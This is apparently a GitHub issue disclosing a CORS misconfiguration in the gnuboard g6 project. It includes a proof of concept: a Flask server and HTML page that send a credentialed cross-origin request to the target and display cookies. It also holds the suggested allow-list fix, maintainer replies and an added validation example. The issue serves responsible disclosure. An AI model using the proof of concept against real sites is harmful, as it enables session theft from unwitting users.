
Reporting a CORS Misconfiguration vulnerability. #626

Open
AkiaCode opened this issue Jul 7, 2024 · 3 comments
Labels: bug (Something isn't working)

AkiaCode commented Jul 7, 2024

Version: 6.0.7

Vuln: CORS Misconfiguration

PoC

# app.py: minimal Flask server that hosts the index.html page below
from flask import Flask, send_from_directory

app = Flask(__name__)

@app.route('/')
def serve_html():
    return send_from_directory('', 'index.html')

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8800)

<!-- index.html: page served by the Flask app above -->
<html>
<body>
    <div id="demo">
        <button type="button" onclick="cors()">Exploit</button>
    </div>
    <script>
        function cors() {
            var xhr = new XMLHttpRequest();
            xhr.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
                    var cookies = document.cookie;
                    document.getElementById("demo").innerText = "Cookies: " + cookies;
                    alert("Cookies: " + cookies);
                }
            };
            xhr.open("GET", "http://<gnuboardHost>", true);
            xhr.withCredentials = true;
            xhr.send();
        }
    </script>
</body>
</html>

Impact

  • Session hijacking is possible just by getting a user to open a link.

Secure Code (core/middleware)
In a production environment (as opposed to testing), allow_origins must be set to the actual host, like this:

    app.add_middleware(
        CORSMiddleware,
        allow_origins=["http://<gnuboardHost>"],
        allow_credentials=True,
        allow_methods=["*"],
        allow_headers=["*"],
    )

Video

video.mp4

ref: b9b6bb7
https://github.com/gnuboard/g6/blob/master/core/middleware.py#L81

Junanjunan (Contributor) commented

@AkiaCode
allow_origins was set to allow all origins for the open-source distribution.
We recommend adding the origins appropriate to the circumstances of your own project.


AkiaCode commented Jul 10, 2024

@Junanjunan
Ah, I see. The commit said it was added to allow everything for testing purposes, so I assumed that logic not intended for release had been added during the release process. Also, in FastAPI CORS, allow_origins cannot be set to * when allow_credentials is True.

ref: https://fastapi.tiangolo.com/ko/tutorial/cors,
https://fastapi.tiangolo.com/tutorial/cors,
https://github.com/tiangolo/fastapi/blob/912524233b535a1d45b54863b2c4e0bd2464b193/docs_src/cors/tutorial001.py#L16

P.S. As a fix, rather than hard-coding the value, it would be better to add a CORS config to the .env file so that ALLOW_ORIGINS can be set directly.
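As an added example (not code from the g6 project or from either commenter), here is one way the .env-driven allow-list suggested above could be handled: ALLOW_ORIGINS (an assumed variable name) is read from the environment, a `*` entry is rejected because it is unsafe together with allow_credentials=True, and a small helper shows which headers an allow-list middleware should add for a listed versus an unlisted Origin. The sample hosts are constructed.

```python
# Added example (not g6 project code): build the CORSMiddleware arguments from an
# .env-style ALLOW_ORIGINS variable (assumed name) and refuse '*' when credentials
# are allowed, which is the combination the issue reports.
import os
from typing import Dict, List, Optional
from urllib.parse import urlsplit


class CorsConfigError(ValueError):
    """Raised when ALLOW_ORIGINS cannot be used safely with allow_credentials=True."""


def parse_allow_origins(raw: str) -> List[str]:
    """Parse a comma-separated ALLOW_ORIGINS value into normalised origins."""
    origins = []
    for item in (s.strip() for s in raw.split(",")):
        if not item:
            continue
        if item == "*":
            # With allow_credentials=True a wildcard lets any site read authenticated responses.
            raise CorsConfigError("'*' is not allowed when credentials are enabled")
        parts = urlsplit(item)
        if parts.scheme not in ("http", "https") or not parts.netloc or parts.path not in ("", "/"):
            raise CorsConfigError(f"not an origin (expected scheme://host[:port]): {item!r}")
        origins.append(f"{parts.scheme}://{parts.netloc}".lower())
    if not origins:
        raise CorsConfigError("ALLOW_ORIGINS is empty; list the site's own origin(s)")
    return origins


def cors_kwargs(env: Optional[Dict[str, str]] = None) -> dict:
    """Keyword arguments for app.add_middleware(CORSMiddleware, **cors_kwargs())."""
    env = dict(os.environ) if env is None else env
    return {
        "allow_origins": parse_allow_origins(env.get("ALLOW_ORIGINS", "")),
        "allow_credentials": True,
        "allow_methods": ["*"],
        "allow_headers": ["*"],
    }


def cors_response_headers(request_origin: Optional[str], allow_origins: List[str]) -> Dict[str, str]:
    """Headers an allow-list middleware adds: echo Origin only when it is listed.
    An unlisted origin gets no Access-Control-Allow-Origin, so the browser blocks
    the cross-site reader even though the request itself carried cookies."""
    if request_origin is None or request_origin.lower() not in allow_origins:
        return {}
    return {
        "Access-Control-Allow-Origin": request_origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",
    }
```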

Junanjunan (Contributor) commented

@AkiaCode
Yes, we will reflect what you pointed out in the next patch. Thank you.

@Junanjunan Junanjunan self-assigned this Jul 10, 2024
Junanjunan added a commit to Junanjunan/g6 that referenced this issue Jul 10, 2024
@Junanjunan Junanjunan added the bug Something isn't working label Jul 10, 2024